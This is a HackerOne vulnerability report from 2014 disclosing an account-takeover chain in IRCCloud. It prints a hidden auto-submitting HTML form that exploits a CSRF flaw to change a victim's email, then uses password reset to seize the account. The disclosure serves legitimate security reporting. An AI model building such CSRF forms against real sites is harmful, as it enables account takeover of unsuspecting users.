IRCCloud: Full account takeover using CSRF and password reset

ID H1:6910
Type hackerone
Reporter melvin
Modified 2014-04-14T13:43:11


An attacker could take over any user account by doing the following things.

1) Exploit a CSRF vulnerability in /chat/user-settings. An attacker creates a webpage on a (non-IRCCloud) website (for example: and inserts a (hidden) form like this:

<form action="" method="post">
<input type="hidden" name="email" value="">
<input type="hidden" name="realname" value="Doesn't Matter">
<input type="hidden" name="hwords" value="">
<input type="hidden" name="autoaway" value="1">
<input type="hidden" name="reqid" value="1">
<input type="hidden" name="session" value="">
<input type="submit"> 
<!-- some code to make the form submit automatically, in the  background-->

2) The attacker will send a link to the page to the victim. When the victim is logged in to IRCCloud, and clicks the link to the page, the e-mail of the victim on IRCCloud will be updated (in the background) to

3) The attacker will receive an e-mail to confirm the e-mail address (see: mail.png).

4) The attacker can now use the password reset functionality to change the password of the victim's account and gain full control over the account.